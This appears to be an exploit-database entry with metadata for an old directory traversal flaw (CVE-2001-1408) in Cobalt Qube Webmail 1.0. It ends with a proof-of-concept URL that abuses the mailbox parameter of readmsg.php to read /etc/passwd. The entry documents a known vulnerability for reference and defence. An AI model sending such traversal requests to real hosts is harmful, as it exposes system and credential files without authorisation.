Cobalt Qube Webmail 1.0 - Directory Traversal

Author: kf
type: webapps
platform: php
port: 
date_added: 2001-07-05 
date_updated: 2016-11-17 
verified: 1 
codes: CVE-2001-1408;OSVDB-8983 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2987/info

Cobalt Qube is an fully-featured network "server appliance".
It includes pre-installed tools and applications and can be put online with very little configuration.

A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host.

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1